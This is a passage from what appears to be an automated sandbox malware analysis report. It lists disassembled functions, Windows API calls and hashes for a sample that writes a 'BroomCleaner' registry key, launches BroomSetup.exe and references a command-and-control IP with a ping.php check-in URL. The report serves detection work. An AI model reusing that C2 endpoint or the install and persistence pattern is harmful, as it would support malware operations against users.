                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2526B74A11229DFDB64CF58D984BACBBB1BF09304F1480D9E54DAB392DB30AA85DF14
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0042612F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1628 42612f-426166 call 4275a4 RegCreateKeyExA 1631 4261f7-4261fb 1628->1631 1632 42616c-42617f 1628->1632 1634 426206-426216 1631->1634 1635 4261fd-426200 RegCloseKey 1631->1635 1633 426182-426187 1632->1633 1633->1633 1636 426189-4261a8 call 402c71 1633->1636 1635->1634 1639 4261ab-4261b0 1636->1639 1639->1639 1640 4261b2-4261ea call 402c71 RegSetValueExA call 402bef 1639->1640 1644 4261ef-4261f2 call 402bef 1640->1644 1644->1631
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00426134
                                                                                                                                                                                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
                                                                                                                                                                                                                                                                                        • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                                                                        • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                                                                        • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                                                                        • Opcode ID: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
                                                                                                                                                                                                                                                                                        • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00426260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1646 426260-42626f 1647 426271-426277 1646->1647 1647->1647 1648 426279-4262ac ShellExecuteExA 1647->1648 1649 4262c5-4262d1 call 402bef 1648->1649 1650 4262ae-4262bf WaitForSingleObject CloseHandle 1648->1650 1650->1649
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                                                                        • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                                                                        • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                                                                        • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1653 4163fd-416411 call 41e97a 1656 416413-416415 1653->1656 1657 416417-41641f 1653->1657 1658 416465-416485 call 41e8e9 1656->1658 1659 416421-416428 1657->1659 1660 41642a-41642d 1657->1660 1668 416493 1658->1668 1669 416487-416491 call 41234b 1658->1669 1659->1660 1662 416435-416449 call 41e97a * 2 1659->1662 1663 41644b-41645b call 41e97a FindCloseChangeNotification 1660->1663 1664 41642f-416433 1660->1664 1662->1656 1662->1663 1663->1656 1675 41645d-416463 GetLastError 1663->1675 1664->1662 1664->1663 1673 416495-416498 1668->1673 1669->1673 1675->1658
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 490808831-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                                                                        • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1678 419767-41977f call 41e97a 1681 419781-419786 call 412381 1678->1681 1682 419792-4197a8 SetFilePointerEx 1678->1682 1689 41978c-419790 1681->1689 1684 4197b9-4197c3 1682->1684 1685 4197aa-4197b7 GetLastError call 41234b 1682->1685 1688 4197c5-4197da 1684->1688 1684->1689 1685->1689 1690 4197df-4197e4 1688->1690 1689->1690
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                                                                        • Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00426217 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1692 426217-42623c CreateFileA 1693 426259-42625f 1692->1693 1694 42623e-426253 WriteFile FindCloseChangeNotification 1692->1694 1694->1693
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3805958096-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                                                                        • Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1703 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1712 401c51-401c61 1703->1712 1713 401c23-401c47 1703->1713 1713->1712 1714 401c49-401c4c call 40187f 1713->1714 1714->1712
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: v*@
                                                                                                                                                                                                                                                                                        • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                                                                        • Opcode ID: b206c63552d3cfde46f7048d87b5e92c7bdaa8cdd7915c41a842bf4ae9388a12
                                                                                                                                                                                                                                                                                        • Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b206c63552d3cfde46f7048d87b5e92c7bdaa8cdd7915c41a842bf4ae9388a12
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00425EE2 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420165198-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c9a2dfee6a5dc0c00aeaf27a507da7a8fac60e2bd9c285666c44caec7eae5a08
                                                                                                                                                                                                                                                                                        • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9a2dfee6a5dc0c00aeaf27a507da7a8fac60e2bd9c285666c44caec7eae5a08
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040E78B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1753 40e78b-40e798 call 40e078 call 4178b7 1758 40e79a-40e7c0 call 4165f6 DeleteCriticalSection 1753->1758 1761 40e7c2-40e7c8 call 41629a 1758->1761 1763 40e7cd-40e7d6 1761->1763
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004178B7: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00439658,00000010,0040E798), ref: 00417919
                                                                                                                                                                                                                                                                                          • Part of subcall function 004178B7: _free.LIBCMT ref: 00417927
                                                                                                                                                                                                                                                                                          • Part of subcall function 004165F6: _free.LIBCMT ref: 00416618
                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(-00000020), ref: 0040E7B4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E7C8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1906768660-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 08f9283f582d2b0ed7622fb32ff0d585bec8a3f1b87bc5093eafe47af9dfc470
                                                                                                                                                                                                                                                                                        • Instruction ID: 0eba196ff218c88136f89900f6ed687e6dcf2c74d43c6b606195c95022efc802
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08f9283f582d2b0ed7622fb32ff0d585bec8a3f1b87bc5093eafe47af9dfc470
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABE048728145205FDB217F6DFC86A9A37A4BF48325746143EF44663165CB34AC61C75C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04200E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000400,?,?,04200223,?,?), ref: 04200E19
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,04200223,?,?), ref: 04200E1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                        • Instruction ID: 7f18243f094355aed393038a9e4f666a0cd0c293d4ed3e5987dac0fabc226c75
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DD0123124512877D7002A94DC09BCD7B5CDF09B62F008011FB0DE9081C770954046E5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                                                                        • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                                                                        • Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 938716162-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
                                                                                                                                                                                                                                                                                        • Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
